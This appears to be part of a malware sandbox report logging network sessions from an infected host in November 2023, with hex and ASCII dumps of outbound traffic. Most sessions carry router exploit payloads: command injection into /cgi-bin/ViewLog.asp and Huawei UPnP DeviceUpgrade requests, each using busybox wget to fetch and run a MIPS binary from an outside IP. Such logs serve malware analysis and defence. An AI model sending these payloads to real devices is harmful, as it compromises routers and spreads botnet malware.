                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.854180098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              597192.168.2.133963262.97.41.2178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.879792929 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.081830025 CET567INHTTP/1.1 503 Service Unavailable
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Thu, 23 Nov 2023 04:17:53 GMT
                                              Connection: close
                                              Content-Length: 326
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              598192.168.2.136005294.123.244.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.912030935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              599192.168.2.133734694.187.109.2088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.913249016 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              600192.168.2.135434295.86.124.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.952809095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              601192.168.2.134074695.86.115.288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.001646996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              602192.168.2.133832694.72.88.1078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.166717052 CET194INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html;charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              Cache-control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              603192.168.2.135537885.122.199.2258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.709769964 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.886236906 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.262237072 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              604192.168.2.134246094.122.194.1918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.709836960 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              605192.168.2.134712061.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.796077013 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:47Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              606192.168.2.1347506156.226.11.9037215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.083146095 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:58.310225010 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:04.454384089 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:16.486190081 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              607192.168.2.134758861.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.507694006 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
